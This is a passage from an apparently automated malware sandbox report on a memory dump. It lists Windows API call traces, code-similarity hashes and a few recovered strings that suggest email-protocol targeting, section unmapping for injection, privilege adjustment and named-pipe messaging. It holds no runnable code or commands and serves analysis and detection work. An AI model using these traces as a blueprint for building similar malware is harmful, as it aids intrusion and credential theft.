    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
    • Part of subcall function 001C4198: RtlAllocateHeap.NTDLL(00000000,00000010), ref: 001C41BA
    • Part of subcall function 001C4198: HeapFree.KERNEL32(00000000,00000000,00000129), ref: 001C41EB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 106
  • API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf
  • String ID:
  • API String ID: 2041449020-0
  • Opcode ID: 540e5d8870bfb511a3d1955c9ad0a08f1ccba355172afbf88c2f817bd2b431a8
  • Instruction ID: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
  • Opcode Fuzzy Hash: E33169710A8C82D6C42BA8D284B47BE9144B7C18D9C8D2B37FE583D0AD1F8321C66B92
  • Instruction Fuzzy Hash: bba761aa04d3bbfd698f0c8175b6501ca71d3289cc1fe08320dbb8ae1c2a3fdb
APIs
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
  • RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
  • HeapFree.KERNEL32(00000000,?), ref: 001C3988
    • Part of subcall function 001CBE3C: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,001EB004,?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000), ref: 001CBE7C
    • Part of subcall function 001CBE3C: CloseHandle.KERNEL32(000000FF), ref: 001CBE87
  • HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001DDB3A: memcpy.NTDLL(001CD4DC,001CD4DC,00000000,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001,00000000,001EC1F9,001CD4DC,00000000), ref: 001DDB5D
    • Part of subcall function 001D9692: memset.NTDLL ref: 001D96C0
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001D9692: _strupr.NTDLL ref: 001D9747
    • Part of subcall function 001D9692: StrTrimA.SHLWAPI(?,?), ref: 001D9754
    • Part of subcall function 001D9692: memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001D9692: lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
  • wsprintfA.USER32 ref: 001C3815
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
  • wsprintfA.USER32 ref: 001C38DC
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
  • HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
  • wsprintfA.USER32 ref: 001C394E
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3ACC: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
    • Part of subcall function 001C3ACC: lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001C3ACC: HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 54
  • API ID: FindNextFileHeapFree$CloseHandleCompareFileTimeCreateFileGetFileTimeStrChrStrRChrlstrcatmemcpymemset
  • String ID: [FILE]$}nls
  • API String ID: 2232422578-3867520224
  • Opcode ID: d63c3d0b7d30395697a42598c95896d20b1220c6287163fcac3fa7287f978ce5
  • Instruction ID: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
  • Opcode Fuzzy Hash: C821E123044BD393D22369821181BA65755FB419E3C0C73F3E9BCB538D4F02A6CA6B96
  • Instruction Fuzzy Hash: 72ed0b863297d3488007a14820031ed271860468cbdb941106eaa0929c179687
APIs
  • memset.NTDLL ref: 001D9C3D
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D9C6F
  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001D9C83
  • CloseHandle.KERNEL32(00000094), ref: 001D9C9A
  • StrRChrA.SHLWAPI(00001000,00000000,0000005C), ref: 001D9CA6
  • lstrcat.KERNEL32(00001000,001EDA23), ref: 001D9CE0
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9D28
  • StrChrA.SHLWAPI(?,0000002E), ref: 001D9D96
  • memcpy.NTDLL(001EB1D4,?,00000000), ref: 001D9DCF
  • FindNextFileA.KERNEL32(00000000,?), ref: 001D9DE4
  • CompareFileTime.KERNEL32(?,?), ref: 001D9E0D
  • HeapFree.KERNEL32(00000000,001EB1D4), ref: 001D9E43
  • HeapFree.KERNEL32(00000000,00001000), ref: 001D9E53
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 75
  • API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen
  • String ID: Local\
  • API String ID: 100657750-422136742
  • Opcode ID: f69422c415cb778fefbc06e8825fe91035b8cc03ac1a89af78bf0cef88205365
  • Instruction ID: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
  • Opcode Fuzzy Hash: 99F02E34B1854287E12374A1016077FDA04E7F20C4D8C7767ED453950A6F0278F7661B
  • Instruction Fuzzy Hash: 66c49fc9188826551a13a81d8cc2f7c2edc845ab8f6028b8dc67af56f16d814c
APIs
  • GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
  • CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
    • Part of subcall function 001D937A: lstrlen.KERNEL32(00000000,00000000,?,00000027,?,001EB068,00000000), ref: 001D93B0
    • Part of subcall function 001D937A: lstrcpy.KERNEL32(00000000,00000000), ref: 001D93D4
    • Part of subcall function 001D937A: lstrcat.KERNEL32(00000000,00000000), ref: 001D93DC
  • GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
  • CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
  • lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
  • lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
  • GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
  • HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
  • CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: CloseHandleRegCloseKey$CreateEventDeleteFileGetLastErrorRegOpenKeyResumeThreadSetEventSleepSuspendThread
  • String ID:
  • API String ID: 1489053536-0
  • Opcode ID: a04800037acdc991d0ac410cda6be3e7e30f85b4b2334a738cde70afcf2a0bc8
  • Instruction ID: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
  • Opcode Fuzzy Hash: BB0104704685824B81277464983A3BADA15FF802D5D4D6366FE68B40895F8333DA3F27
  • Instruction Fuzzy Hash: 36a5ddbc87084e266d50b713a62e435bbad551641728e73816c0b0ac65f44fd9
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C17A8
  • CloseHandle.KERNEL32(001EAF58), ref: 001C1809
  • DeleteFileW.KERNEL32(00000000,?,?,?,?,00000000), ref: 001C1816
  • GetLastError.KERNEL32(?,?,?,00000000), ref: 001C1820
  • RegCloseKey.ADVAPI32(?,?,?,?,00000000), ref: 001C187D
  • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 001C189C
  • SuspendThread.KERNEL32(00000000), ref: 001C18AA
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001C18BE
  • SetEvent.KERNEL32(00000000), ref: 001C18CB
  • CloseHandle.KERNEL32(00000000), ref: 001C18D2
  • Sleep.KERNEL32(000001F4), ref: 001C18E5
  • ResumeThread.KERNEL32(00000000), ref: 001C1909
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$GetCurrentThreadGetCurrentThreadIdRtlAllocateHeapRtlImageNtHeaderlstrlenwsprintf
  • String ID: W
  • API String ID: 3968678070-655174618
  • Opcode ID: 65c7814ccee3740933dfcccc29e4eab5d936ac043747db4873335771aa46cfd7
  • Instruction ID: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
  • Opcode Fuzzy Hash: 8901B138088895A7C06790614063FBFD6017F822D0C4DF712F9693819E2F4372D35B57
  • Instruction Fuzzy Hash: 5d65c5167d05eb071b61c740fb2aa7fd16767ced16d889d5a98f858644bbd093
APIs
  • RtlImageNtHeader.NTDLL ref: 001C1A48
  • GetCurrentThreadId.KERNEL32 ref: 001C1A5E
  • GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
  • HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
  • RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
  • wsprintfA.USER32 ref: 001C1B50
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$WaitForSingleObject$ReleaseMutexlstrcpynmemcpymemset
  • String ID:
  • API String ID: 1576942631-0
  • Opcode ID: bbb80d9d18486b754104cd36c0130e3b39926c5d582aef500eb7a1e8a66222a2
  • Instruction ID: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
  • Opcode Fuzzy Hash: 4A217F33157A22D745163840C0507BEF482FB825E694CB711FE21722DE4A8197F6AFDD
  • Instruction Fuzzy Hash: ec06ce50e56994e4f65fca86296eb1a4dcbc1b1930a3dec25b055dcee645f614
APIs
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB4AE
  • memcpy.NTDLL(?,?,00000010), ref: 001DB4D1
  • memset.NTDLL ref: 001DB51D
  • lstrcpyn.KERNEL32(?,?,00000034), ref: 001DB531
  • GetLastError.KERNEL32 ref: 001DB55F
  • GetLastError.KERNEL32 ref: 001DB5A2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB5C1
  • WaitForSingleObject.KERNEL32(?,000927C0), ref: 001DB5FB
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001DB609
    • Part of subcall function 001DB350: memset.NTDLL ref: 001DB398
    • Part of subcall function 001DB350: QueueUserWorkItem.KERNEL32(001DAFC4,?,00000010), ref: 001DB439
    • Part of subcall function 001DB350: GetLastError.KERNEL32 ref: 001DB443
  • GetLastError.KERNEL32 ref: 001DB67E
  • ReleaseMutex.KERNEL32(?), ref: 001DB690
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: GetLastError$CloseHandleCreateFileGetModuleHandleGetWindowsDirectoryHeapFreeRtlAllocateHeapStrChrWriteFilewsprintf
  • String ID:
  • API String ID: 2627060994-0
  • Opcode ID: db8d6b5184187aba615ed9859a1217546e47d51c2a19850b1dde47917d77b9bd
  • Instruction ID: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
  • Opcode Fuzzy Hash: 00E05538564C02C3C4279AA888803BEDA41B3801C1E8E0212FA002A5BAAB0323C88F63
  • Instruction Fuzzy Hash: df8b16018d32c17adcafddecac367e62ad292682b52cd612f4b16c26ee5ce5b9
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
  • GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
  • StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
  • wsprintfA.USER32 ref: 001C15D0
  • CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
  • GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
  • WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
  • GetLastError.KERNEL32 ref: 001C1615
  • CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
  • GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy
  • String ID:
  • API String ID: 732536130-0
  • Opcode ID: a427ae31280889244c8d76e620d9b5f9788be67866348582a82e8a58517c2dc5
  • Instruction ID: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
  • Opcode Fuzzy Hash: 90116D11582D32C3D113B46AC1E8B7EFA45FF961D6C1F3001E9127510E4A935EF6AB6E
  • Instruction Fuzzy Hash: a2cec6491fe12f34e3abab1a275dd9d209e051195fd81796f6ed6d95fe43367f
APIs
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • lstrlen.KERNEL32(?,?,?,00000001), ref: 001C216D
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C218F
  • lstrcpy.KERNEL32(00000020,?), ref: 001C21AE
  • lstrlen.KERNEL32(?), ref: 001C21B8
  • memcpy.NTDLL(?,?,?), ref: 001C21F9
  • memcpy.NTDLL(?,?,?), ref: 001C220C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C224F
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • SwitchToThread.KERNEL32(?,00000000,?,?), ref: 001C2230
    • Part of subcall function 001C2B66: memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C2B66: CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2B66: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C2B66: GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2275
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C2291
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 83
  • API ID: CloseHandleGetLastError$ConnectNamedPipeCreateEventDisconnectNamedPipeFlushFileBuffersWaitForMultipleObjectsWaitForSingleObject
  • String ID:
  • API String ID: 4178450735-0
  • Opcode ID: fea2056c6ced76e25bc66d29ae2c0ef00b9ab400e991bc076a25110f2a978033
  • Instruction ID: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
  • Opcode Fuzzy Hash: 34F07B324973A09BC12724748146BBA7A46FF612E7D8C7302ECB0B518E1F05A6F65369
  • Instruction Fuzzy Hash: 05167e17d539e8951b2ec5fe1b97e76cff5c88daf7da0f392f1248a609e86f53
APIs
  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 001CBBD2
  • ConnectNamedPipe.KERNEL32(?,?), ref: 001CBC02
  • GetLastError.KERNEL32 ref: 001CBC0C
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CBC30
    • Part of subcall function 001CB978: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,001CBA84,00000008,?,00000010,00000001,00000000,0000012B), ref: 001CB997
    • Part of subcall function 001CB978: WriteFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9CB
    • Part of subcall function 001CB978: ReadFile.KERNEL32(?,00000001,?,?,?), ref: 001CB9D3
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CB9DD
    • Part of subcall function 001CB978: WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,00002710), ref: 001CB9F9
    • Part of subcall function 001CB978: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001CBA12
    • Part of subcall function 001CB978: CancelIo.KERNEL32(?), ref: 001CBA27
    • Part of subcall function 001CB978: CloseHandle.KERNEL32(?), ref: 001CBA37
    • Part of subcall function 001CB978: GetLastError.KERNEL32 ref: 001CBA3F
  • CloseHandle.KERNEL32(?), ref: 001CBC9E
    • Part of subcall function 001CBB13: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CBB31
    • Part of subcall function 001CBB13: HeapFree.KERNEL32(00000000,00000000), ref: 001CBB84
  • FlushFileBuffers.KERNEL32(?), ref: 001CBC73
  • DisconnectNamedPipe.KERNEL32(?,?,?,00000010,00000000), ref: 001CBC7C
  • WaitForSingleObject.KERNEL32(001EB094,00000000), ref: 001CBC89
  • GetLastError.KERNEL32 ref: 001CBCAB
  • CloseHandle.KERNEL32(?), ref: 001CBCB8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject
  • String ID:
  • API String ID: 1546928802-0
  • Opcode ID: 44cbb82d1bc8bc2d29e416fe044868003d437d2d6ba21b65bae40637e45a7bca
  • Instruction ID: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
  • Opcode Fuzzy Hash: 18E02BA421196647D99708B00461B1FAE82BBE23E484C3303F552A25C2BB0712C4DF2A
  • Instruction Fuzzy Hash: 191c3ac2f4053567846d1cc33e924360c7a86817a4ea2a5247009256dd1e7f80
APIs
  • SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
  • CloseHandle.KERNEL32(?), ref: 001DB86F
  • CloseHandle.KERNEL32(?), ref: 001DB87D
  • RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
  • RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
  • Sleep.KERNEL32(000001F4), ref: 001DB8C1
  • CloseHandle.KERNEL32(?), ref: 001DB8CE
  • LocalFree.KERNEL32(?), ref: 001DB8DC
  • RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 23
  • API ID: LocalFreelstrcatlstrcpymemcpy
  • String ID: IMAP$P$POP3$SMTP
  • API String ID: 2001391702-3667654339
  • Opcode ID: 43434d26df3a4f5d7c34ecf30ecc38ca90c9099c92fdaea40e4787011e532f06
  • Instruction ID: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
  • Opcode Fuzzy Hash: 3911AF310449E3F79AAB229950026AB81429F117E2E5C9B21ED7C785CF6F03B14B770D
  • Instruction Fuzzy Hash: 6478c962306ff3ebee45f1e70cc600bc5173ee11dde7fe85537008a4b3b65a8d
APIs
  • lstrcpyW.KERNEL32(00000000,001ED5A0), ref: 001DF84B
  • lstrcatW.KERNEL32(00000000,00000000), ref: 001DF853
  • memcpy.NTDLL(00000000,?,00000000,-00000002), ref: 001DF8F1
  • LocalFree.KERNEL32(?,-00000002), ref: 001DF908
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001D93F1: lstrlenW.KERNEL32(00000000,00000000,001EAC44), ref: 001D9401
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: GetLastError$VirtualAlloc$RtlEnterCriticalSectionRtlLeaveCriticalSectionSwitchToThread
  • String ID:
  • API String ID: 2452875170-0
  • Opcode ID: f7250d7c747c6724e85bc87f4a1d164c9bcb3d791413c0bfd27e5859a3665385
  • Instruction ID: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
  • Opcode Fuzzy Hash: F931CCA2419FC2A7D5936A400890BBAC5C3FB12FF6D6CA732B674A02C81FC5274D2F54
  • Instruction Fuzzy Hash: e9cda0ef1bba535e69377ecfbf93933b7da227d9232d932a7ffe86fd6aa33c96
APIs
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB03B
  • VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 001DB05A
  • GetLastError.KERNEL32 ref: 001DB20B
  • GetLastError.KERNEL32 ref: 001DB28D
  • SwitchToThread.KERNEL32(?,?,?,?), ref: 001DB2D2
    • Part of subcall function 001DAF5A: InterlockedExchange.KERNEL32(001C13EB,000000FF), ref: 001DAF61
  • GetLastError.KERNEL32 ref: 001DB308
  • GetLastError.KERNEL32 ref: 001DB317
  • RtlEnterCriticalSection.NTDLL(?), ref: 001DB327
  • RtlLeaveCriticalSection.NTDLL(?), ref: 001DB338
Memory Dump Source
